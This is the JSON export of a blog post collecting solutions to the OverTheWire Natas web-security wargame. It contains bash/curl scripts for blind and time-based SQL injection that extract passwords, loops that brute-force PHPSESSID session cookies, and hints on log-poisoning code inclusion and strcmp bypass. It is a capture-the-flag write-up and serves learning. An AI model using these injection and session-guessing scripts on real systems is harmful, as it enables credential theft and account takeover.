{"id":977,"date":"2018-04-13T13:42:46","date_gmt":"2018-04-13T17:42:46","guid":{"rendered":"https:\/\/www.joshho.com\/blog\/?p=977"},"modified":"2018-04-13T13:55:05","modified_gmt":"2018-04-13T17:55:05","slug":"collection-of-natas","status":"publish","type":"post","link":"https:\/\/www.joshho.com\/blog\/2018\/04\/13\/collection-of-natas\/","title":{"rendered":"Collection of Natas"},"content":{"rendered":"<p><strong>Natas 15 <\/strong><br \/>\nAttempt until the password substring matches<br \/>\n<code><\/p>\n<pre lang='bash'>k=''\r\nfor v in {{a..z},{A..Z},{0..9}}; \r\n  do\r\n    curl \"natas15:$pw@\"'http:\/\/natas15.natas.labs.overthewire.org\/index.php'\r\n     --data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'$k$v'%25'\r\n     --compressed > out 2>\/dev\/null; \r\n    if [ `grep -c 'user exists' out` -gt 0 ]; \r\n      then k=$k$v; echo $k; break; \r\n    fi; \r\ndone<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 18 <\/strong><br \/>\nCapture Password by introducing a 10 second sleep if the password is correct<br \/>\n<code><\/p>\n<pre lang='bash'>#timeout.sh contains:\r\nperl -e 'alarm shift; exec @ARGV' \"$@\";<\/pre>\n<p><\/code><br \/>\nTest the duration of the curl command<br \/>\n<code><\/p>\n<pre lang='bash'>for z in {0..33}; \r\n  do \r\n    w=0; \r\n    for v in {{a..z},{A..Z},{0..9}}; \r\n      do .\/timeout.sh 2 bash -c \"curl natas18:$pw@'http:\/\/natas17.natas.labs.overthewire.org\/index.php' \r\n        --data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22'$pw$v'%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23' \r\n        --compressed > out 2>\/dev\/null\" 2>\/dev\/null; \r\n        if [ $? -ne 0 ]; \r\n          then pw=$pw$v; \r\n          echo $pw; \r\n          w=1; \r\n        fi; \r\n    done; \r\n    if [ $w -eq 0 ]; then break; fi; \r\ndone;<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 19<\/strong><br \/>\nSearch for session ID with a different page output<br \/>\n<code><\/p>\n<pre lang='bash'>for k in {0..640};\r\n  do\r\n    curl \"natas19:$pw@\"'http:\/\/natas18.natas.labs.overthewire.org\/index.php' -H 'Cookie: PHPSESSID='$k\r\n     --compressed > out 2>\/dev\/null; \r\n     if [ `grep regular out | wc -l` -eq 0 ]; \r\n       then echo $k; \r\n       break; \r\n     fi; \r\ndone<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 20 <\/strong><br \/>\nBrute Force for session ID after capturing ~500 new sessions (where username=admin) to determine common cookie elements, starts with 3, ends with 2d61646d696e.<br \/>\n<code><\/p>\n<pre lang='bash'>for k in {0..64000}; \r\n  do\r\n    curl \"natas20:$pw@\"'http:\/\/natas19.natas.labs.overthewire.org\/index.php?debug=1'\r\n      -H 'Cookie: PHPSESSID=3'$k'2d61646d696e' --compressed > out 2>\/dev\/null; \r\n    if [ `grep -E 'regular|username' out | wc -l ` -eq 0 ]; \r\n      then echo 'found: '$k; \r\n      break; \r\n    fi; \r\n    if [ $((k % 100)) -eq 0 ]; \r\n      then echo $k; \r\n    fi; \r\ndone;<\/pre>\n<p><\/code><\/p>\n<p><strong>Other Hints<\/strong><\/p>\n<p><strong>21<\/strong> &#8211; Add %0A to trick the sessionwrite<br \/>\n<strong>22<\/strong> &#8211; Simply change the form to send admin=1, then use the sessionID in the other site<br \/>\n<strong>23<\/strong> &#8211; Ignore the redirect (and get the full webpage via curl)<br \/>\n<strong>24<\/strong> &#8211; Break strcmp (make it fail)<br \/>\n<strong>25<\/strong> &#8211; Log our php code into the *.log, then have the index.php &#8216;include&#8217; the php commands we embedded in the log file.<\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Natas 15 <\/strong><br \/>\nAttempt until the password substring matches<br \/>\n<code><\/p>\n<pre lang='bash'>k=''\r\nfor v in {{a..z},{A..Z},{0..9}}; \r\n  do\r\n    curl \"natas15:$pw@\"'http:\/\/natas15.natas.labs.overthewire.org\/index.php'\r\n     --data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'$k$v'%25'\r\n     --compressed > out 2>\/dev\/null; \r\n    if [ `grep -c 'user exists' out` -gt 0 ]; \r\n      then k=$k$v; echo $k; break; \r\n    fi; \r\ndone<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 18 <\/strong><br \/>\nCapture Password by introducing a 10 second sleep if the password is correct<br \/>\n<code><\/p>\n<pre lang='bash'>#timeout.sh contains:\r\nperl -e 'alarm shift; exec @ARGV' \"$@\";<\/pre>\n<p><\/code><br \/>\nTest the duration of the curl command<br \/>\n<code><\/p>\n<pre lang='bash'>for z in {0..33}; \r\n  do \r\n    w=0; \r\n    for v in {{a..z},{A..Z},{0..9}}; \r\n      do .\/timeout.sh 2 bash -c \"curl natas18:$pw@'http:\/\/natas17.natas.labs.overthewire.org\/index.php' \r\n        --data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22'$pw$v'%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23' \r\n        --compressed > out 2>\/dev\/null\" 2>\/dev\/null; \r\n        if [ $? -ne 0 ]; \r\n          then pw=$pw$v; \r\n          echo $pw; \r\n          w=1; \r\n        fi; \r\n    done; \r\n    if [ $w -eq 0 ]; then break; fi; \r\ndone;<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 19<\/strong><br \/>\nSearch for session ID with a different page output<br \/>\n<code><\/p>\n<pre lang='bash'>for k in {0..640};\r\n  do\r\n    curl \"natas19:$pw@\"'http:\/\/natas18.natas.labs.overthewire.org\/index.php' -H 'Cookie: PHPSESSID='$k\r\n     --compressed > out 2>\/dev\/null; \r\n     if [ `grep regular out | wc -l` -eq 0 ]; \r\n       then echo $k; \r\n       break; \r\n     fi; \r\ndone<\/pre>\n<p><\/code><\/p>\n<p><strong>Natas 20 <\/strong><br \/>\nBrute Force for session ID after capturing ~500 new sessions (where username=admin) to determine common cookie elements, starts with 3, ends with 2d61646d696e.<br \/>\n<code><\/p>\n<pre lang='bash'>for k in {0..64000}; \r\n  do\r\n    curl \"natas20:$pw@\"'http:\/\/natas19.natas.labs.overthewire.org\/index.php?debug=1'\r\n      -H 'Cookie: PHPSESSID=3'$k'2d61646d696e' --compressed > out 2>\/dev\/null; \r\n    if [ `grep -E 'regular|username' out | wc -l ` -eq 0 ]; \r\n      then echo 'found: '$k; \r\n      break; \r\n    fi; \r\n    if [ $((k % 100)) -eq 0 ]; \r\n      then echo $k; \r\n    fi; \r\ndone;<\/pre>\n<p><\/code><\/p>\n<p><strong>Other Hints<\/strong><\/p>\n<p><strong>21<\/strong> &#8211; Add %0A to trick the sessionwrite<br \/>\n<strong>22<\/strong> &#8211; Simply change the form to send admin=1, then use the sessionID in the other site<br \/>\n<strong>23<\/strong> &#8211; Ignore the redirect (and get the full webpage via curl)<br \/>\n<strong>24<\/strong> &#8211; Break strcmp (make it fail)<br \/>\n<strong>25<\/strong> &#8211; Log our php code into the *.log, then have the index.php &#8216;include&#8217; the php commands we embedded in the log file.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[82],"tags":[86,89,83,53],"_links":{"self":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/posts\/977"}],"collection":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/comments?post=977"}],"version-history":[{"count":0,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/posts\/977\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/media?parent=977"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/categories?post=977"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.joshho.com\/blog\/wp-json\/wp\/v2\/tags?post=977"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}